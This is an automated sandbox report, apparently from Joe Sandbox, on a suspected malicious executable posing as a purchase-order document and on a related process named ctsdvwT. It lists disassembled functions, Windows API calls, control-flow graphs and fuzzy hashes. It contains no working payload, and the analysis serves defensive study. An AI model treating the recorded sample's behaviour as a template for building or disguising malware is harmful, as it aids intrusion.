                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 0568E345
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: cd74bd07982e7ef4888c7e45bf9f3390556962a2f83494c5cd0c04bc3be2a0a4
                                        • Instruction ID: 0f978454a42af0a25a66e6e54e0ccd9ed5244f1623309ba423e67d2a5fde7438
                                        • Opcode Fuzzy Hash: cd74bd07982e7ef4888c7e45bf9f3390556962a2f83494c5cd0c04bc3be2a0a4
                                        • Instruction Fuzzy Hash: 011145B1800349CFDB20DF9AC484B9EFBF8EB48320F10845AD519A3700C375A940CFA4
                                        Function 0568C4A4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1106 568c4a4-568da8c KiUserCallbackDispatcher 1109 568da8e-568da94 1106->1109 1110 568da95-568daa9 1106->1110 1109->1110
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,0568D9F5), ref: 0568DA7F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 48a9cf35190325dc3c0158676cc5b88d6ae0a3ab694d2df5d3401eb6d81809da
                                        • Instruction ID: 2da0264392f25532fb826f079b1399db643310c602933ca22fcc5a642f5298de
                                        • Opcode Fuzzy Hash: 48a9cf35190325dc3c0158676cc5b88d6ae0a3ab694d2df5d3401eb6d81809da
                                        • Instruction Fuzzy Hash: 3E1145B18043498FDB20DF9AD484BEEFBF8EB48314F248459D519A7340D775A940CFA4
                                        Function 0568DA18 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,0568D9F5), ref: 0568DA7F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 019efe93880c7c6340f3c8bf3d5c69880be2436497182bd6baebbf303fe64df3
                                        • Instruction ID: 498b257a1a9a8de9547e193518b7401c74efa9a03fb205bbea0fb2e37a6f3e51
                                        • Opcode Fuzzy Hash: 019efe93880c7c6340f3c8bf3d5c69880be2436497182bd6baebbf303fe64df3
                                        • Instruction Fuzzy Hash: D61145B18043898FDB20DF9AC484BEEFBF8EB48310F24845AD419A3240C775A940CFA4
                                        Function 0568E2E9 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 0568E345
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4192003114.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_5680000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 05047aa2d45a628ada9a3b0fffb0f26a5051fcd01c2bd35108e134b1c2f84ba3
                                        • Instruction ID: 8c5d1f475d0ef6de14b063dec8b5980f3defa934e7250dd66c31863623315c71
                                        • Opcode Fuzzy Hash: 05047aa2d45a628ada9a3b0fffb0f26a5051fcd01c2bd35108e134b1c2f84ba3
                                        • Instruction Fuzzy Hash: 711130B18003898FDB20DFAAD444BDEFBF8EB48224F24845AE518A3600C375A940CFA0
                                        Function 00E1D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4180819043.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_e1d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b8260daa10cf32875251b9ede1b089ffb7b0bbcbb60cf725605a7c3def9c549
                                        • Instruction ID: 6504e0b66c7ef6a72123762a7dd92b3e5d2e0d0ea7d49185e2392ca16e1fbb14
                                        • Opcode Fuzzy Hash: 0b8260daa10cf32875251b9ede1b089ffb7b0bbcbb60cf725605a7c3def9c549
                                        • Instruction Fuzzy Hash: E421F275608340DFDB14DF14D980B56BBA6FB88318F20C56DD84A5B286C33AD887CA62
                                        Function 00E1D104 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4180819043.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_e1d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed087a560cee9de6ec61d0c40e942ff4203cbea16e1eb3919679c0928320a4d8
                                        • Instruction ID: 2c07ecb210c3da4c6e59aad583270902610756de62a12454d5e4b0acbadc3967
                                        • Opcode Fuzzy Hash: ed087a560cee9de6ec61d0c40e942ff4203cbea16e1eb3919679c0928320a4d8
                                        • Instruction Fuzzy Hash: 7A2104B1609344EFDB04DF20CDC0B56BBA5FB84318F20C56DE90A5B256C33AD886CA61
                                        Function 00E1D005 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4180819043.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_e1d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d5857f280341d6755fdc3cdfc1cf2c5697e544aa6009c84f0f6c98a461b9e743
                                        • Instruction ID: cabb390d15bb9e7bf64d9f2585a9dbbb8d7169dde90fe47d3495208649a00ec0
                                        • Opcode Fuzzy Hash: d5857f280341d6755fdc3cdfc1cf2c5697e544aa6009c84f0f6c98a461b9e743
                                        • Instruction Fuzzy Hash: 6121537550D3C08FC712CF24D994755BF71EB46318F28C5EAD8498B6A7C33A984ACB62
                                        Function 00E1D0FF Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.4180819043.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_e1d000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82c1591fb7cb945e1b6a1ce8599ed47a39f5d479b331759251bd4a9e08807f4d
                                        • Instruction ID: 89ec2dc03a6b43af803bcc577e5c43aaa180a15e6562517eb892f65bccf10ac2
                                        • Opcode Fuzzy Hash: 82c1591fb7cb945e1b6a1ce8599ed47a39f5d479b331759251bd4a9e08807f4d
                                        • Instruction Fuzzy Hash: 7A11DD75608680DFCB05CF10C9C4B15BFB1FB84318F24C6ADD8494B656C33AD88ACB51

                                        Execution Graph

                                        Execution Coverage:4.9%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:33
                                        Total number of Limit Nodes:5
                                        execution_graph 25223 2c84668 25224 2c8467a 25223->25224 25225 2c84686 25224->25225 25227 2c84778 25224->25227 25228 2c8479d 25227->25228 25232 2c84888 25228->25232 25236 2c84879 25228->25236 25233 2c848af 25232->25233 25234 2c8498c 25233->25234 25240 2c844d4 25233->25240 25238 2c84888 25236->25238 25237 2c8498c 25237->25237 25238->25237 25239 2c844d4 CreateActCtxA 25238->25239 25239->25237 25241 2c85918 CreateActCtxA 25240->25241 25243 2c859cf 25241->25243 25244 2c8d198 25245 2c8d1de GetCurrentProcess 25244->25245 25247 2c8d229 25245->25247 25248 2c8d230 GetCurrentThread 25245->25248 25247->25248 25249 2c8d26d GetCurrentProcess 25248->25249 25250 2c8d266 25248->25250 25251 2c8d2a3 25249->25251 25250->25249 25252 2c8d2cb GetCurrentThreadId 25251->25252 25253 2c8d2fc 25252->25253 25254 2c8d3e0 DuplicateHandle 25255 2c8d476 25254->25255 25256 2c8acf0 25259 2c8add9 25256->25259 25257 2c8acff 25260 2c8ae1c 25259->25260 25261 2c8adf9 25259->25261 25260->25257 25261->25260 25262 2c8b020 GetModuleHandleW 25261->25262 25263 2c8b04d 25262->25263 25263->25257

                                        Executed Functions

                                        Function 02C8D188 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 02C8D216
                                        • GetCurrentThread.KERNEL32 ref: 02C8D253
                                        • GetCurrentProcess.KERNEL32 ref: 02C8D290
                                        • GetCurrentThreadId.KERNEL32 ref: 02C8D2E9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 5b4c62c1920d8ef792ce7bbfac7da961f8f7122fedf3b92246b8bc6cfcccd860
                                        • Instruction ID: 9b5982f42a0fdfcdef97170e0702f7bc7e0ea0dd31d646b4cdb0793fd7bf530b
                                        • Opcode Fuzzy Hash: 5b4c62c1920d8ef792ce7bbfac7da961f8f7122fedf3b92246b8bc6cfcccd860
                                        • Instruction Fuzzy Hash: CB5167B091174A8FDB04DFA9D548BDEBBF1BF88304F208459E01AA73A1DB749944CF66
                                        Function 02C8D198 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 02C8D216
                                        • GetCurrentThread.KERNEL32 ref: 02C8D253
                                        • GetCurrentProcess.KERNEL32 ref: 02C8D290
                                        • GetCurrentThreadId.KERNEL32 ref: 02C8D2E9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 64fc3489817f4aa3f908d6b692c9d1466eb9dc9703f7722727a2a89db49ac1f9
                                        • Instruction ID: ca66058b37e5d343f491e25475075107410bed5691da21c26b0a862230ed8713
                                        • Opcode Fuzzy Hash: 64fc3489817f4aa3f908d6b692c9d1466eb9dc9703f7722727a2a89db49ac1f9
                                        • Instruction Fuzzy Hash: D25178B090174A8FDB14DFAAD548B9EBBF1FF88304F208459E019A7391DB749944CF66
                                        Function 02C8ADD9 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 44 2c8add9-2c8adf7 45 2c8adf9-2c8ae06 call 2c8a16c 44->45 46 2c8ae23-2c8ae27 44->46 52 2c8ae08 45->52 53 2c8ae1c 45->53 48 2c8ae29-2c8ae33 46->48 49 2c8ae3b-2c8ae7c 46->49 48->49 55 2c8ae89-2c8ae97 49->55 56 2c8ae7e-2c8ae86 49->56 100 2c8ae0e call 2c8b480 52->100 101 2c8ae0e call 2c8b471 52->101 53->46 57 2c8ae99-2c8ae9e 55->57 58 2c8aebb-2c8aebd 55->58 56->55 60 2c8aea9 57->60 61 2c8aea0-2c8aea7 call 2c8a178 57->61 63 2c8aec0-2c8aec7 58->63 59 2c8ae14-2c8ae16 59->53 62 2c8af58-2c8b018 59->62 65 2c8aeab-2c8aeb9 60->65 61->65 95 2c8b01a-2c8b01d 62->95 96 2c8b020-2c8b04b GetModuleHandleW 62->96 66 2c8aec9-2c8aed1 63->66 67 2c8aed4-2c8aedb 63->67 65->63 66->67 68 2c8aee8-2c8aef1 call 2c8a188 67->68 69 2c8aedd-2c8aee5 67->69 75 2c8aefe-2c8af03 68->75 76 2c8aef3-2c8aefb 68->76 69->68 77 2c8af21-2c8af2e 75->77 78 2c8af05-2c8af0c 75->78 76->75 85 2c8af30-2c8af4e 77->85 86 2c8af51-2c8af57 77->86 78->77 80 2c8af0e-2c8af1e call 2c8a198 call 2c8a1a8 78->80 80->77 85->86 95->96 97 2c8b04d-2c8b053 96->97 98 2c8b054-2c8b068 96->98 97->98 100->59 101->59
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02C8B03E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 8dd5ebd63c453a500803cb32d00ecb6204eb0680253acd454ceef0a475d25255
                                        • Instruction ID: f0cb84e5a821d9bef8da2216d3ed544818edd33c912d962b2b43a849a60aa5db
                                        • Opcode Fuzzy Hash: 8dd5ebd63c453a500803cb32d00ecb6204eb0680253acd454ceef0a475d25255
                                        • Instruction Fuzzy Hash: 55814871A00B458FDB24EF29D44479ABBF1BF88308F108A2ED48AD7A40DB75E955CF90
                                        Function 02C8590D Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 102 2c8590d-2c85914 103 2c858b1-2c858d9 102->103 104 2c85916-2c859d9 CreateActCtxA 102->104 109 2c858db-2c858e1 103->109 110 2c858e2-2c85903 103->110 107 2c859db-2c859e1 104->107 108 2c859e2-2c85a3c 104->108 107->108 118 2c85a4b-2c85a4f 108->118 119 2c85a3e-2c85a41 108->119 109->110 120 2c85a60-2c85a90 118->120 121 2c85a51-2c85a5d 118->121 119->118 125 2c85a42-2c85a4a 120->125 126 2c85a92-2c85b14 120->126 121->120 125->118 129 2c859cf-2c859d9 125->129 129->107 129->108
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 02C859C9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 3918228bb8caa6f57baae224a08eb7f7e1209b3666811709d871bea59c8edf7a
                                        • Instruction ID: 9e42d99f27a2593ac8f57c20ab02e705486a7a850cb715fa0ec3573a24b5d5ff
                                        • Opcode Fuzzy Hash: 3918228bb8caa6f57baae224a08eb7f7e1209b3666811709d871bea59c8edf7a
                                        • Instruction Fuzzy Hash: F251F2B1D01719CFDB24DFA5C8847DEBBF1AF48308F61806AD408AB251D7B56A4ACF50
                                        Function 02C844D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 130 2c844d4-2c859d9 CreateActCtxA 133 2c859db-2c859e1 130->133 134 2c859e2-2c85a3c 130->134 133->134 141 2c85a4b-2c85a4f 134->141 142 2c85a3e-2c85a41 134->142 143 2c85a60-2c85a90 141->143 144 2c85a51-2c85a5d 141->144 142->141 148 2c85a42-2c85a4a 143->148 149 2c85a92-2c85b14 143->149 144->143 148->141 152 2c859cf-2c859d9 148->152 152->133 152->134
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 02C859C9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 3a1b70bc70cea8a665c61582d1c648d6dcee3c09ed0ef9faf2d68aec99760e2f
                                        • Instruction ID: a1303869161ace63cdc5c8a19e24cae940b3c7e615494dc944eaab9af5e0c98d
                                        • Opcode Fuzzy Hash: 3a1b70bc70cea8a665c61582d1c648d6dcee3c09ed0ef9faf2d68aec99760e2f
                                        • Instruction Fuzzy Hash: 5441C070D01719CFDB24DFA9C8847DEBBB5BF48704F61806AD408AB251DBB5694ACF90
                                        Function 02C8D3E0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 153 2c8d3e0-2c8d474 DuplicateHandle 154 2c8d47d-2c8d49a 153->154 155 2c8d476-2c8d47c 153->155 155->154
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C8D467
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 9a21146e4c0f71d0424e65671fab54700081a0a49335637eda56a0626c68035d
                                        • Instruction ID: 31c277c0da50a0e247448961b7b80db7f07992866bf60667ec7da0cb1ccf63cd
                                        • Opcode Fuzzy Hash: 9a21146e4c0f71d0424e65671fab54700081a0a49335637eda56a0626c68035d
                                        • Instruction Fuzzy Hash: 8821E4B5900249EFDB10CFAAD484ADEBBF4EB48310F14841AE915A3350D374A944CF65
                                        Function 02C8D3D9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 158 2c8d3d9-2c8d474 DuplicateHandle 159 2c8d47d-2c8d49a 158->159 160 2c8d476-2c8d47c 158->160 160->159
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C8D467
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 161a2ee5452c4e76c3fe0d943bf3d58b79455c95a6002655d770d535f0e1e088
                                        • Instruction ID: d158ed4258a610670be38649dafa2bb201a963704218223625eb012495124fab
                                        • Opcode Fuzzy Hash: 161a2ee5452c4e76c3fe0d943bf3d58b79455c95a6002655d770d535f0e1e088
                                        • Instruction Fuzzy Hash: 8821E2B5D00249DFDB10CFAAD584ADEBBF4FB48314F14841AE919A3250D378A944CF65
                                        Function 02C8AFD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 163 2c8afd8-2c8b018 164 2c8b01a-2c8b01d 163->164 165 2c8b020-2c8b04b GetModuleHandleW 163->165 164->165 166 2c8b04d-2c8b053 165->166 167 2c8b054-2c8b068 165->167 166->167
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02C8B03E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867850330.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2c80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: be46f252e1fe6f7625a6df7044ae3e23f91fbc74a703a3b5db17dd1706eec6c6
                                        • Instruction ID: f4779a4c4905ac7cb8c786b64edf05e2a3b1909a0a7b71f75799b1ad8c6d972a
                                        • Opcode Fuzzy Hash: be46f252e1fe6f7625a6df7044ae3e23f91fbc74a703a3b5db17dd1706eec6c6
                                        • Instruction Fuzzy Hash: D91110B5C007498FDB20DF9AD444BDEFBF4FB88218F20841AD429A7210D379AA45CFA1
                                        Function 02A7D1FC Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867106069.0000000002A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a7d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0194b18e513b190c9b64452e63fe0fd37b7ff512e939e488be3284e580d1ee17
                                        • Instruction ID: f21f47d88de37eda150cf6dc667166a29a2e1bb908045717107e89d0afc45cda
                                        • Opcode Fuzzy Hash: 0194b18e513b190c9b64452e63fe0fd37b7ff512e939e488be3284e580d1ee17
                                        • Instruction Fuzzy Hash: A221F172604740DFDB05DF10D8C0B26FB65FF98214F24C569E9090A246CB36D417CBA6
                                        Function 02A7D4C4 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867106069.0000000002A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a7d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc1de35b3fe13f0cfda23a7a6fb024e57a4e17c105a254729d441b926f7567aa
                                        • Instruction ID: 89b08974834d5af1339a627c4fce46cdbf4fe618ed55366dca11dec1f4e96996
                                        • Opcode Fuzzy Hash: fc1de35b3fe13f0cfda23a7a6fb024e57a4e17c105a254729d441b926f7567aa
                                        • Instruction Fuzzy Hash: 6D210371500640DFDB05DF10D9C0B26BF65FF88718F24C569E9090B256C736D456CBA6
                                        Function 02A8D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867267593.0000000002A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A8D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a8d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 14b07b5236ed9b106747dc46522e74081081387dda2eb75e9c49049d18a4e75f
                                        • Instruction ID: f6eedbde898b464c14e77229f2ca531fdf5ab4ce6764ac70eac16ed5e26c6a45
                                        • Opcode Fuzzy Hash: 14b07b5236ed9b106747dc46522e74081081387dda2eb75e9c49049d18a4e75f
                                        • Instruction Fuzzy Hash: FD21F271604B44EFDB14EF20D9C0B16BBB5FB84314F20C569D84A4B286CB3AD847CA62
                                        Function 02A8D1D4 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867267593.0000000002A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A8D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a8d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 09bd249b195f5e592afa55d00628cd33f663d66c069aa87fbed018db29aac758
                                        • Instruction ID: 5ea8672131ebbaccab91f023de1ce8df8279e64982b373a03f4e81f352fa3340
                                        • Opcode Fuzzy Hash: 09bd249b195f5e592afa55d00628cd33f663d66c069aa87fbed018db29aac758
                                        • Instruction Fuzzy Hash: F721F2B1504644EFDB05EF20D9C0B26FBB5FB88314F20C66DE8494B292DB36D846CA62
                                        Function 02A8D006 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867267593.0000000002A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A8D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a8d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57abc3b8adb7c4d8d676654cf76a419f99b8a0788b127eaa8f6766a00fb35665
                                        • Instruction ID: 4b540df0ba802d20dc428dc661dc839c37cf8c1d21a65d4c7678d589b6df0901
                                        • Opcode Fuzzy Hash: 57abc3b8adb7c4d8d676654cf76a419f99b8a0788b127eaa8f6766a00fb35665
                                        • Instruction Fuzzy Hash: DA2180755087809FCB02DF24D9D4711BF71EB46214F28C5EAD8498B2A7C33A9846CB62
                                        Function 02A7D1F7 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867106069.0000000002A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a7d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed047447bd486b7177fd6f5a6328ccc2b655c600b881774d0be4f41f3027c7dc
                                        • Instruction ID: 753d06265284b960100fd8b4fdf5d902ff0ae029be0e7ba912202a7d1cca94db
                                        • Opcode Fuzzy Hash: ed047447bd486b7177fd6f5a6328ccc2b655c600b881774d0be4f41f3027c7dc
                                        • Instruction Fuzzy Hash: 74218976504680DFCB06CF50D9C4B16FF62FB88214F2886A9DD090A656C33AD46ACBA2
                                        Function 02A7D4BF Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867106069.0000000002A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a7d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 510a4494be8f8f37c5290ac1f004916700623b455eed770fed4643cd7704ed07
                                        • Instruction ID: 7d12b4761eeea5f5f1381e6ba0d4b088b68181426d55e56232c75d653dcf69c9
                                        • Opcode Fuzzy Hash: 510a4494be8f8f37c5290ac1f004916700623b455eed770fed4643cd7704ed07
                                        • Instruction Fuzzy Hash: 8411E276504680CFCB16CF10D9C4B16BF72FF88328F24C6A9D8490B656C33AD45ACBA2
                                        Function 02A8D1CF Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867267593.0000000002A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A8D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a8d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c968dcaa042c25ee6ba8684c53e35a7e88ce7353a734fe3290a9ec7f8938d7ca
                                        • Instruction ID: ee3fb360b299699be2010961d8360a266dfb57fd7bbcf92c18c80845c80dbb65
                                        • Opcode Fuzzy Hash: c968dcaa042c25ee6ba8684c53e35a7e88ce7353a734fe3290a9ec7f8938d7ca
                                        • Instruction Fuzzy Hash: 6F11DD75504680DFCB01DF20C5C0B15FBB1FB84318F24C6ADD8494B696D33AD45ACB62
                                        Function 02A7D759 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
